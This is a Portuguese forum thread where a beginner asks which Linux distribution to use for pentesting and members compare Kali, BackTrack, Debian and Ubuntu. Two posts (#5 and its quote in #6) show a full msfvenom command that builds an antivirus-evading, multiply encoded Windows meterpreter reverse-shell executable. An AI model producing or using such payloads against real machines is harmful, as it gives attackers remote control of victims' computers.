Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Qual distribuição Linux usar?

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dúvida Qual distribuição Linux usar?

    Olá, por favor tenho algumas dúvidas sobre o Linux e gostaria de saber se alguém poderia me ajudar...
    Tenho interesse de fazer pentest e queria de saber se seria melhor instalar o Kali ou o Backtrack?
    Se usar o debian ou ubunto posso fazer pentest?
    E também tenho uma dúvida sobre comandos: Nas ferramentas do Kali por exemplo, cada ferramenta tem apenas um tipo de comando ou tem vários que podem ser utilizados em cada uma delas? E se tem vários existe algum livro que mostre todos? Obrigado.
    Similar Threads

  • Font Size
    #2
    Vamos por partes:

    1- O Kali Linux é a continuação do Backtrack, que foi descontinuado. Logo, o que há de novo está no Kali. Na minha opinião o Kali é melhor.

    2 - Sim, qual quer um serve. Tanto que existem distribuições baseadas em Debian e outras no Ubuntu. Se não me engano os principais (mais conhecidos) são geralmente baseados no Debian.

    3 - Existem ferramentas multi uso, que podem apresentar outras configurações DENTRO dela mesma, mas para o acesso de uma ferramenta em si basta apenas um comando.
    Os desenvolvedores também se preocupam muito em facilitar o funcionamento de suas ferramentas, a grande maioria te ajuda passo a passo, dando opções de filtro, etc.

    4 - Por fim, o Kali disponibiliza uma lista de ferramentas que já estão inclusas nele. Informações mais detalhadas podem ser acessadas em cada uma delas aqui: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Comment


    • Font Size
      #3
      Vamos lá ...
      Kali e te, como plataforma o Debian sou um apaixonado nessa plataforma uso a mesma desde de 1994 um ano após seu aparecimento... me sinto muito bem com ela... no em tanto o fundador do Debian, Ian Murdock morreu no final do ano passa ao seus 42 ( um gênio na minha opinião )


      então não sei se as futura versões será a mesma coisa nem sei tb se vai ter continuação no projeto....

      Ja o Back Track as primeira versões que usei achei bem legal mais as outra tive algumas complicações e compartilhamento de componente do meu Leptop... Não curto muito Ubuntu acho que foi uma empática de primeira vista rsrsr ... mas curto as VPS em Ubuntu... ( acho que e gosto )

      Obs tive e tenho ainda um problema com o Kali 2.0 no meu mac ... Não estou conseguindo fazer dual-boot nem fudendo... mais ... resolvi o mesmo com um emulador linux... Mas não consegui fazer dual-boot.

      Conclusão final:

      Linux e linux tanto BT quanto o Kali nada mais que um linux com tool pra pen-teste as mesma vc consegui baixa em site do desenvolvedores... acho que muita coisa nem vai usa... e melhor vc pegar e deixa no seu linux o que vai usa,,, isso deixa ele mais leve, os gráfico e outro coisa pode ser baixado tb de sua preferência .. fica a dica, espero te ajudado.

      Comment


      • Font Size
        #4
        Dúvida sobre o linux

        Postado Originalmente por Cougar Ver Post
        Vamos por partes:

        1- O Kali Linux é a continuação do Backtrack, que foi descontinuado. Logo, o que há de novo está no Kali. Na minha opinião o Kali é melhor.

        2 - Sim, qual quer um serve. Tanto que existem distribuições baseadas em Debian e outras no Ubuntu. Se não me engano os principais (mais conhecidos) são geralmente baseados no Debian.

        3 - Existem ferramentas multi uso, que podem apresentar outras configurações DENTRO dela mesma, mas para o acesso de uma ferramenta em si basta apenas um comando.
        Os desenvolvedores também se preocupam muito em facilitar o funcionamento de suas ferramentas, a grande maioria te ajuda passo a passo, dando opções de filtro, etc.

        4 - Por fim, o Kali disponibiliza uma lista de ferramentas que já estão inclusas nele. Informações mais detalhadas podem ser acessadas em cada uma delas aqui: Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...






        Ok, entendi, mas tenho outra dúvida, quer dizer que, caso eu escolha o Ubuntu eu terei que instalar algum programa para fazer o pentest ou ele já vem junto com o Sistema?
        E outra dúvida: Por exemplo, quando vc diz que dentro de uma ferramenta existem outras configurações significa que pode ter vários comandos?
        Eu penso em instalar o Ubuntu para pegar o jeito do Linux e depois ir para outra versão mais aprimorada, se é que posso chamar assim...mas queria poder fazer pentest e outras coisas em um mesmo linux, e o ubuntu parece ser mais interessante a príncipio pois parece ser mais fácil que o kali...

        Comment


        • Font Size
          #5
          Nunca testei as Distros para Pentesting do Ubuntu, e não, ele já vem com os acessórios, talvez você precise baixar alguma ferramenta especifica que não veio junto com a Distro.

          Quando disse sobre os vários comandos, quis dizer que cada ferramenta tem vários parâmetros exemplo do MSFvenom:

          Código:
          ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
          ./msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
          ./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
          
          Cada um faz uma coisa diferente, depende do propósito, mas a ferramenta é a mesma.
          Eu não acho que há problemas em ir direto para o Kali (eu fiz isso na época do BT). Nunca tinha usado Linux. Simplesmente baixei e me acostumei.

          Espero que tenha entendido. Abs.

          Comment


          • Font Size
            #6
            Postado Originalmente por Cougar Ver Post
            Nunca testei as Distros para Pentesting do Ubuntu, e não, ele já vem com os acessórios, talvez você precise baixar alguma ferramenta especifica que não veio junto com a Distro.

            Quando disse sobre os vários comandos, quis dizer que cada ferramenta tem vários parâmetros exemplo do MSFvenom:

            Código:
            ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.3 LPORT=4444 -f raw -e x86/shikata_ga_nai -i 5 | \
            ./msfvenom -a x86 --platform windows -e x86/countdown -i 8  -f raw | \
            ./msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -f exe -o payload.exe
            
            Cada um faz uma coisa diferente, depende do propósito, mas a ferramenta é a mesma.
            Eu não acho que há problemas em ir direto para o Kali (eu fiz isso na época do BT). Nunca tinha usado Linux. Simplesmente baixei e me acostumei.

            Espero que tenha entendido. Abs.


            Entendi, mas tenho mais duas perguntas, (sei que sou mala mas é que eu quero saber e fica mais fácil perguntar) é sobre os comandos, existe algum lugar que ensine todos e para que serve cada um? Alguma apostila por ex. eu procurei e não achei, deve existir algum curso ( de preferência gratuito pois pago eu acho que deve ter explicando tudo) explicando isso, e a outra dúvida é sobre os drivers, (de rede, de som, etc) quando eu for instalar o Kali (ou Ubuntu) eles estarão lá ou preciso procurar por eles? Sei que minha malice é grande mas você me respondeu muito bem, então agora ganhou um discípulo.kkkk....

            Comment


            • Font Size
              #7
              Não conheço nenhum livro, deve ter claro, principalmente em inglês. Não tem necessidade de saber comandos que não vai utilizar nunca. O meu negócio é saber somente o que quero. Quer fazer SQLi? Engenharia reversa? MITM? Pesquisa isoladamente.

              O que espero disso é tornar o aprendizado menos massante e exaustivo. Lembrando que é apenas o meu caso!


              Em relação aos drivers, som funcionou ok, rede também. Não notei nada de anormal no driver de vídeo ou processador. Resumindo nunca tive problema com drivers no Linux.

              Comment


              • Font Size
                #8
                oi

                Recomendaria Ubuntu, pois ele é bem bonito e o ambiente de trabalho (parte gráfica) é bem completa em questões de configurações do sistema, mas recomendo que você comece a se familiarizar com o terminal, por exemplo: instalar programas por comandos e não com o gerenciador de aplicativos.
                Essa é minha opinião.
                Abraço



                SEMPRE PENSE O QUE IRAR DIZER PARA NÃO LEVAR UM BRUTALITY.
                "Quem fala de MIM na minha ausência respeita MINHA presença"

                Comment


                • Font Size
                  #9
                  Bom, quanto a Sistemas Operacionais para Invasões, acredito que o melhor a fazer é baixar a versão mais recente do Kali Linux e instalar em dual boot ou então em um pendrive...

                  Existem muitos profissionais trabalhando para continuar fazendo do Kali o mais completo sistema para pen test. Ele já vem com as melhores ferramentas instaladas, é todo configurável. E a maior parte do conteúdo disponível sobre o assunto faz referência ao Kali.

                  Claro que tem como usar qualquer outra distribuição Linux instalar componentes, drivers, ferramentas e configurar. Mas na minha opinião é um trabalho desnecessário.

                  O arsenal do Kali tem praticamente todas as ferramentas mais utilizadas e mais um pouco...

                  Não acho que ele seja um sistema pra usar no dia a dia. Mas uma instalação em dual boot é perfeita!

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por Bruno_menor Ver Post
                    Recomendaria Ubuntu, pois ele é bem bonito e o ambiente de trabalho (parte gráfica) é bem completa em questões de configurações do sistema, mas recomendo que você comece a se familiarizar com o terminal, por exemplo: instalar programas por comandos e não com o gerenciador de aplicativos.
                    Essa é minha opinião.
                    Abraço

                    E vc acha que o Debian seria uma boa opção também? E se eu escolher o Debian seria possivel ter algumas ferramentas do Kali nele?

                    Comment


                    • Font Size
                      #11
                      Eu recomendo kali-linux

                      E só estudar alguns comandos do debian e passar a pesquisar como funciona ou como usar cada ferramenta do kali que vai dar tudo certo!...











                      Bons estudos!
                      Estudando:
                      *Programação*_Redes*_ Pentest *
                      * Eng.reversa_*E.S_*and other things !*
                      --------------------------------------------------------------------
                      "Treine enquanto eles dormem.
                      Estude enquanto eles se divertem.
                      Persista enquanto eles descansam,e então,viva o que eles sonham. "

                      --------------------------------------------------------------------

                      Comment


                      • Font Size
                        #12
                        Postado Originalmente por Cougar Ver Post
                        Não conheço nenhum livro, deve ter claro, principalmente em inglês. Não tem necessidade de saber comandos que não vai utilizar nunca. O meu negócio é saber somente o que quero. Quer fazer SQLi? Engenharia reversa? MITM? Pesquisa isoladamente.

                        O que espero disso é tornar o aprendizado menos massante e exaustivo. Lembrando que é apenas o meu caso!


                        Em relação aos drivers, som funcionou ok, rede também. Não notei nada de anormal no driver de vídeo ou processador. Resumindo nunca tive problema com drivers no Linux.

                        Ok, entendi, agora deixe eu contar o que aconteceu: Tentei instalar o Ubunto e o Kali e não consegui, ( estava tentando fazer uma instalação somente com um deles, não queria o Windows junto, dando boot pelo CD) pois bem, não consegui de jeito nenhum, iniciava a instalação e não ia em frente, fiz isso várias vezes e nada, até que tentei baixar o Debian e quando tentei instalar foi de primeira e rápido, sem nenhum problema, e eu ainda gravei a ISO na velocidade máxima enquanto os outros eu tinha colocado uma velocidade menor para não perder dados, enfim...você saberia me dizer o porque disso?

                        Comment


                        • Font Size
                          #13
                          Não consigo te ajudar sem saber o erro, pode ter 1000 motivos.

                          Comment


                          • Font Size
                            #14
                            Postado Originalmente por Cougar Ver Post
                            Não consigo te ajudar sem saber o erro, pode ter 1000 motivos.
                            Pois é, não lembro a mensagem que estava dando, mas de qualquer forma o Debian esta funcionando bem...
                            Vou tentar entender como funciona as coisas por aqui, é bem diferente do windows...acho um pouco estranho agora mas acho que com a prática isso melhora, vc sabe dizer qual ferramenta posso utilizar para fazer pentest? Talvez até já tenha aqui no Debian, instalei com tudo que tinha direito...

                            Comment


                            • Font Size
                              #15
                              Como você está usando uma Distro básica não vai ter as ferramentas, só baixando mesmo.
                              Vai no site (Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...) vê o tópico que te interessa, baixa a ferramenta (pesquise se não sabe como), e executa ela (novamente pesquise se não sabe como).

                              Comment

                              X
                              Working...
                              X